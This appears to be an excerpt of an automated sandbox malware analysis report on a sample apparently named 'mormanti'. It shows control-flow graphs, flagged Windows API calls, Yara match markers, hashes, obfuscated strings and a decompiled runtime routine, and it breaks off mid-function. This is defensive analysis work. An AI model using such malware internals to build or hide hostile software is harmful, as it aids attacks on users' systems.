                                                                                                • CreateFileW.KERNELBASE(?,00000100,00000001,00000000,00000003,00000000,00000000,?,?,?), ref: 02DC596C
                                                                                                • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028,?,?,?), ref: 02DC59E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateHandleInformation
                                                                                                • String ID:
                                                                                                • API String ID: 3667790775-0
                                                                                                • Opcode ID: 700463bc55b23c3621883cdcb4b2f89d35d26a65cad31a50505bb3d9e126300d
                                                                                                • Instruction ID: 4f346337810d4f6644ddce7ab2548f1703d15fa87d5a3c137cdf09da29ab9948
                                                                                                • Opcode Fuzzy Hash: 700463bc55b23c3621883cdcb4b2f89d35d26a65cad31a50505bb3d9e126300d
                                                                                                • Instruction Fuzzy Hash: 81412D34B0420A6BDB18DA689C847AE76A5DB48B10F70016EF515FB3C0DF71DE458BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 575 c1285b-c12896 call c1283f __wgetmainargs 578 c128a0 575->578 579 c12898-c1289f _amsg_exit 575->579 579->578
                                                                                                APIs
                                                                                                  • Part of subcall function 00C1283F: __onexit.MSVCRT ref: 00C12847
                                                                                                • __wgetmainargs.MSVCR90 ref: 00C12886
                                                                                                • _amsg_exit.MSVCR90 ref: 00C1289A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: __onexit__wgetmainargs_amsg_exit
                                                                                                • String ID:
                                                                                                • API String ID: 4257578400-0
                                                                                                • Opcode ID: 35e4ea89e8fa84dab0f9274beac45ca115afeccc58a9c076846ca3d26f280163
                                                                                                • Instruction ID: 63f4e73cc7cda97164264f3f37c37b775af22abefa961bd64677ec10d0b2207d
                                                                                                • Opcode Fuzzy Hash: 35e4ea89e8fa84dab0f9274beac45ca115afeccc58a9c076846ca3d26f280163
                                                                                                • Instruction Fuzzy Hash: 7FE0ECB85423016AD604AF249C027D936A0B71B709B42C0B8E941962A1DBB080E5F70A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 598 2dc67d8-2dc67ef 599 2dc67f1-2dc67f3 598->599 600 2dc67f4-2dc67f9 599->600 601 2dc67ff 600->601 602 2dc6935-2dc693a 600->602 605 2dc6805-2dc680a 601->605 606 2dc68f6-2dc6930 call 2dc2f00 call 2dc2bfc 601->606 603 2dc693c-2dc6941 602->603 604 2dc699b-2dc69ac call 2dc2fb6 602->604 607 2dc6979-2dc6996 call 2dc2f00 603->607 608 2dc6943-2dc6948 603->608 622 2dc69ae-2dc69ba 604->622 623 2dc69bf-2dc69c6 604->623 609 2dc68b4-2dc68d5 call 2dc2f00 OpenSCManagerW 605->609 610 2dc6810-2dc6815 605->610 606->599 607->599 613 2dc694a-2dc694f 608->613 614 2dc6960-2dc6974 608->614 633 2dc68ec-2dc68f1 609->633 634 2dc68d7-2dc68e7 609->634 616 2dc687b-2dc689f call 2dc2f00 610->616 617 2dc6817-2dc681c 610->617 624 2dc69c7-2dc69cc 613->624 625 2dc6951-2dc695b call 2dc5667 613->625 614->600 641 2dc68a2-2dc68af 616->641 627 2dc686e-2dc6876 617->627 628 2dc681e-2dc6823 617->628 622->599 623->624 624->600 631 2dc69d2 624->631 625->599 627->600 628->624 635 2dc6829-2dc686d call 2dc2f00 call 2dc23eb 628->635 631->631 633->599 634->600 641->600
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 02DC68CF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1889721586-0
                                                                                                • Opcode ID: 378404c894a654280cf2eea37549809294b31be073a0368c4c4da67c6e8f9a40
                                                                                                • Instruction ID: d137db34f50a227f3c36371fa7e107d3a1bb3282554463314c276b4803c26983
                                                                                                • Opcode Fuzzy Hash: 378404c894a654280cf2eea37549809294b31be073a0368c4c4da67c6e8f9a40
                                                                                                • Instruction Fuzzy Hash: F64119703443075BD6389AA89C89F2D629DDB84714F30083EBA45EB7C4CE50DC499A9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 647 2dc5a8f-2dc5aa0 648 2dc5aa5-2dc5aab 647->648 649 2dc5bb4 648->649 650 2dc5ab1-2dc5ab7 648->650 653 2dc5bb9-2dc5bbf 649->653 651 2dc5abd-2dc5ac3 650->651 652 2dc5b92-2dc5baf call 2dc2f00 650->652 654 2dc5ac9-2dc5acf 651->654 655 2dc5bc7-2dc5bda call 2dc437a 651->655 652->648 653->648 657 2dc5bc5 653->657 658 2dc5b4c-2dc5b90 call 2dc2f00 * 2 654->658 659 2dc5ad1-2dc5ad7 654->659 661 2dc5be5-2dc5bed 655->661 667 2dc5bdc 655->667 657->661 658->653 664 2dc5ad9-2dc5adf 659->664 665 2dc5b21-2dc5b47 call 2dc2f00 659->665 664->653 668 2dc5ae5-2dc5b14 call 2dc2f00 CreateFileW 664->668 665->648 672 2dc5bde-2dc5be0 667->672 673 2dc5be2-2dc5be4 667->673 668->661 679 2dc5b1a-2dc5b1f 668->679 672->661 672->673 673->661 679->648
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000), ref: 02DC5B0D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 1b639b2ec8b1ebbbd28142e06133490cd9ad1041bb675d30eb6598ad82ceee32
                                                                                                • Instruction ID: 2f557852b1c0f8fabe0cc1331912b80ff285ce22a3c83920a829bc81d6cf9102
                                                                                                • Opcode Fuzzy Hash: 1b639b2ec8b1ebbbd28142e06133490cd9ad1041bb675d30eb6598ad82ceee32
                                                                                                • Instruction Fuzzy Hash: B931AF72E0431526DA24A4696CC8FAE966FDBC4720FB5005EED50BB3C0CF516D80C6B6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 683 2dc3564-2dc35b0 call 2dc2f34 call 2dc2f00 CreateProcessW 688 2dc35f1 683->688 689 2dc35b2-2dc35b7 683->689 690 2dc35f3-2dc35f9 688->690 691 2dc35b9-2dc35bf 689->691 692 2dc35c5-2dc35ef call 2dc2f00 * 2 689->692 693 2dc35c0-2dc35c3 691->693 692->693 693->690
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02DC35AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 1e153ce14dc5516947b3b2631774f1796cc2d9bfe74ea9ecc3bd69f9f6cc9927
                                                                                                • Instruction ID: 99f6fee40550169ce3698c556cf8c65f868935e7055a50aac5f7e360ca2384ab
                                                                                                • Opcode Fuzzy Hash: 1e153ce14dc5516947b3b2631774f1796cc2d9bfe74ea9ecc3bd69f9f6cc9927
                                                                                                • Instruction Fuzzy Hash: C611A172B1020E7BAB11DAA59C40CBF776EEB85764B30442EBC16DB384DE71CE0585B0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • DeleteFileW.KERNELBASE(?), ref: 02DC27AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: 6a1bb93908afc2a1caa1319e99df5202f8ba1d48d2848991ad569f7bf8e6e716
                                                                                                • Instruction ID: a240903939ba98999eca2451181ce1c6cf4a82de9f0b668c03a603a56033bb8b
                                                                                                • Opcode Fuzzy Hash: 6a1bb93908afc2a1caa1319e99df5202f8ba1d48d2848991ad569f7bf8e6e716
                                                                                                • Instruction Fuzzy Hash: FBF0EC2570431927D51475685C25EBB329FCBC4720F20016FBD58E73C5DEA5CD8605B5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 710 2dc2fb6-2dc2fe9 call 2dc2f00 * 2 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 02DC2FE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 2789db4cbd2f47612d4614af521ccb7a4a8d09eb94984b978349a42fce7eeb12
                                                                                                • Instruction ID: c571433f5e2a882549685b36bf68093751778fef6f1a1edc18ec762cc89d139b
                                                                                                • Opcode Fuzzy Hash: 2789db4cbd2f47612d4614af521ccb7a4a8d09eb94984b978349a42fce7eeb12
                                                                                                • Instruction Fuzzy Hash: 48D0C75525759016E55475656C15B6B014A9F95B10F30850F6614AF2C88DA58C4141BA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 716 2dc4171-2dc418f call 2dc47c9 call 2dc2f00 ExitProcess
                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 02DC418D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: 4f12a683114e87a03047e88717255a48732639f01366d0deba0e5039b6408396
                                                                                                • Instruction ID: 2d6ad316d7bd6b72d58e80038c6570f70e082b382a9309395d67cb62173e860a
                                                                                                • Opcode Fuzzy Hash: 4f12a683114e87a03047e88717255a48732639f01366d0deba0e5039b6408396
                                                                                                • Instruction Fuzzy Hash: 86B012B639120531E0283A700C25B0F00274BD0F00F34840E25121F3CD8FD18C0016BE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                C-Code - Quality: 85%
                                                                                                			E00C1272C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                				intOrPtr _v0;
                                                                                                				void* _v804;
                                                                                                				intOrPtr _v808;
                                                                                                				intOrPtr _v812;
                                                                                                				intOrPtr _t6;
                                                                                                				intOrPtr _t11;
                                                                                                				intOrPtr _t12;
                                                                                                				intOrPtr _t13;
                                                                                                				intOrPtr _t19;
                                                                                                				intOrPtr _t20;
                                                                                                				intOrPtr _t23;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr* _t29;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t25 = __esi;
                                                                                                				_t24 = __edi;
                                                                                                				_t23 = __edx;
                                                                                                				_t20 = __ecx;
                                                                                                				_t19 = __ebx;
                                                                                                				_t6 = __eax;
                                                                                                				_t32 = _t20 -  *0xc16018; // 0x649a0353
                                                                                                				if(_t32 == 0) {
                                                                                                					asm("repe ret");
                                                                                                				}
                                                                                                				 *0xc161d8 = _t6;
                                                                                                				 *0xc161d4 = _t20;
                                                                                                				 *0xc161d0 = _t23;
                                                                                                				 *0xc161cc = _t19;
                                                                                                				 *0xc161c8 = _t25;
                                                                                                				 *0xc161c4 = _t24;
                                                                                                				 *0xc161f0 = ss;
                                                                                                				 *0xc161e4 = cs;
                                                                                                				 *0xc161c0 = ds;
                                                                                                				 *0xc161bc = es;
                                                                                                				 *0xc161b8 = fs;
                                                                                                				 *0xc161b4 = gs;
                                                                                                				asm("pushfd");
                                                                                                				_pop( *0xc161e8);
                                                                                                				 *0xc161dc =  *_t29;
                                                                                                				 *0xc161e0 = _v0;
                                                                                                				 *0xc161ec =  &_a4;
                                                                                                				 *0xc16128 = 0x10001;
                                                                                                				_t11 =  *0xc161e0; // 0x0
                                                                                                				 *0xc160dc = _t11;
                                                                                                				 *0xc160d0 = 0xc0000409;
                                                                                                				 *0xc160d4 = 1;
                                                                                                				_t12 =  *0xc16018; // 0x649a0353
                                                                                                				_v812 = _t12;
                                                                                                				_t13 =  *0xc1601c; // 0x9b65fcac
                                                                                                				_v808 = _t13;
                                                                                                				 *0xc16120 = IsDebuggerPresent();
                                                                                                				_push(1);
                                                                                                				L00C1308E();
                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                				UnhandledExceptionFilter(0xc14254);
                                                                                                				if( *0xc16120 == 0) {
                                                                                                					_push(1);
                                                                                                					L00C1308E();
                                                                                                				}
                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                			}


















                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c12732
                                                                                                0x00c12734
                                                                                                0x00c12734
                                                                                                0x00c12b75
                                                                                                0x00c12b7a
                                                                                                0x00c12b80
                                                                                                0x00c12b86
                                                                                                0x00c12b8c
                                                                                                0x00c12b92
                                                                                                0x00c12b98
                                                                                                0x00c12b9f
                                                                                                0x00c12ba6
                                                                                                0x00c12bad
                                                                                                0x00c12bb4
                                                                                                0x00c12bbb
                                                                                                0x00c12bc2
                                                                                                0x00c12bc3
                                                                                                0x00c12bcc
                                                                                                0x00c12bd4
                                                                                                0x00c12bdc
                                                                                                0x00c12be7
                                                                                                0x00c12bf1
                                                                                                0x00c12bf6
                                                                                                0x00c12bfb
                                                                                                0x00c12c05
                                                                                                0x00c12c0f
                                                                                                0x00c12c14
                                                                                                0x00c12c1a
                                                                                                0x00c12c1f
                                                                                                0x00c12c2b
                                                                                                0x00c12c30
                                                                                                0x00c12c32
                                                                                                0x00c12c3a
                                                                                                0x00c12c45
                                                                                                0x00c12c52
                                                                                                0x00c12c54
                                                                                                0x00c12c56
                                                                                                0x00c12c5b
                                                                                                0x00c12c6f

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00C12C25
                                                                                                • _crt_debugger_hook.MSVCR90(00000001), ref: 00C12C32
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C12C3A
                                                                                                • UnhandledExceptionFilter.KERNEL32(00C14254), ref: 00C12C45
                                                                                                • _crt_debugger_hook.MSVCR90(00000001), ref: 00C12C56
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C12C61
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C12C68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 3369434319-0
                                                                                                • Opcode ID: 94ba875b617978d77ab22ed9a7bd25b07491e21a9467eba8b402f2e18a90f439
                                                                                                • Instruction ID: 59bbf85b3b7af2a8cc4db606e1224606f3967854976eae17940ff2feeacac1f5
                                                                                                • Opcode Fuzzy Hash: 94ba875b617978d77ab22ed9a7bd25b07491e21a9467eba8b402f2e18a90f439
                                                                                                • Instruction Fuzzy Hash: C221CCB4801204EFCB51DF25E8487CC3BB4BB0F315F21C15AE90987262E7B19A85DF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,+$-v y$i)$|@W
                                                                                                • API String ID: 0-1795958218
                                                                                                • Opcode ID: 5c3b8ee2a8d616b8b2a4e0a5c41b98f18c0676194af09eea036cbe58527da467
                                                                                                • Instruction ID: adc1a950463e9685234c674b13480e211448e1c74a6a547dae882edecf9d4d99
                                                                                                • Opcode Fuzzy Hash: 5c3b8ee2a8d616b8b2a4e0a5c41b98f18c0676194af09eea036cbe58527da467
                                                                                                • Instruction Fuzzy Hash: BB51A0B1D46309EBEB14CFA4D68A6DDFFB5EF55320F20C09AC001AB294D7B81B45AB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,+$-v y$i)$|@W
                                                                                                • API String ID: 0-1795958218
                                                                                                • Opcode ID: 5c3b8ee2a8d616b8b2a4e0a5c41b98f18c0676194af09eea036cbe58527da467
                                                                                                • Instruction ID: 50f09fff12cd9736f47ac562c7e6854af29d0d3ce5ccdc8364cc6dd2c64828f6
                                                                                                • Opcode Fuzzy Hash: 5c3b8ee2a8d616b8b2a4e0a5c41b98f18c0676194af09eea036cbe58527da467
                                                                                                • Instruction Fuzzy Hash: 6A51A0B1D46309EBEB14CFA4D68A69DFFB5EF45320F20C09AC001AB294D7B81B45AB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • 0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu, xrefs: 00C11FF4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslwr
                                                                                                • String ID: 0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu
                                                                                                • API String ID: 1719055571-2307915346
                                                                                                • Opcode ID: 37768053c9b4828e64172bbaecb64826244be8c8d5984db7e1b80529faca53e3
                                                                                                • Instruction ID: ac6623eb1c90825c23b6433753a1314bc8acd3b4eca33e29191fbc8b3005af2c
                                                                                                • Opcode Fuzzy Hash: 37768053c9b4828e64172bbaecb64826244be8c8d5984db7e1b80529faca53e3
                                                                                                • Instruction Fuzzy Hash: E7F0E93A211250DFD364CF19D4849AAF7F4FB8A371726C16AE89687720C734AC50EB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,+$i)
                                                                                                • API String ID: 0-2095692697
                                                                                                • Opcode ID: 06edf3a5fa7240f74c324cc7a93d6480effee33e413d48d210d0f490493c4704
                                                                                                • Instruction ID: 7d33893bd5c46336cc7d602fcd62bc0d07c1dc9c5bbffec7cb30960f990afbc5
                                                                                                • Opcode Fuzzy Hash: 06edf3a5fa7240f74c324cc7a93d6480effee33e413d48d210d0f490493c4704
                                                                                                • Instruction Fuzzy Hash: 9E51E2B2D42709EBEB58CFA5D6895CDFBB1EF44310F20C09AC445AB2A0D7785F85AB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,+$i)
                                                                                                • API String ID: 0-2095692697
                                                                                                • Opcode ID: 06edf3a5fa7240f74c324cc7a93d6480effee33e413d48d210d0f490493c4704
                                                                                                • Instruction ID: fc3756ffa7e438eeff6c61a46eb9fdf30cae995eefdd4baffe112f3760c018dd
                                                                                                • Opcode Fuzzy Hash: 06edf3a5fa7240f74c324cc7a93d6480effee33e413d48d210d0f490493c4704
                                                                                                • Instruction Fuzzy Hash: 2F51C2B1D42709EBEB58CFA9D6895CDFBB1EF44310F20C09AC445AB250D7785B85AB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                • Instruction ID: d729209d8c0f9a500250998417222cb013b7928a6e60230b2bf7694785a026b4
                                                                                                • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                • Instruction Fuzzy Hash: B631A07660434ACFC711DF18D490AABB7E4FF88309F4549ADE59687312E730E906CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eaf7215f2012e7721943fb902af0a867eef1b18a0ed53c9f5cc091a5af86874a
                                                                                                • Instruction ID: 578bb16124952d226fb64c796914d9d8f26f4d38d996da12128050eaa754f245
                                                                                                • Opcode Fuzzy Hash: eaf7215f2012e7721943fb902af0a867eef1b18a0ed53c9f5cc091a5af86874a
                                                                                                • Instruction Fuzzy Hash: 66E04F33320550DBCB26DA5484A49E6F3F5EF813707290969DD87A3B00C320BC01C754
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eaf7215f2012e7721943fb902af0a867eef1b18a0ed53c9f5cc091a5af86874a
                                                                                                • Instruction ID: ed14a6634285d1a91bfa8022e00ea767e7e50a64dbe8e3128c9c67d756f54de8
                                                                                                • Opcode Fuzzy Hash: eaf7215f2012e7721943fb902af0a867eef1b18a0ed53c9f5cc091a5af86874a
                                                                                                • Instruction Fuzzy Hash: 84E04F723205568BC630DA988484956F3A9EB80770B39087DE985B3710C320BC00C750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E00C113AF(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                                                                				intOrPtr _t104;
                                                                                                				void* _t105;
                                                                                                				signed int _t114;
                                                                                                				intOrPtr _t117;
                                                                                                				struct HRGN__* _t120;
                                                                                                				signed int _t128;
                                                                                                				void* _t148;
                                                                                                				void* _t150;
                                                                                                				CHAR* _t151;
                                                                                                				int _t152;
                                                                                                				int _t154;
                                                                                                				void* _t159;
                                                                                                				signed int _t160;
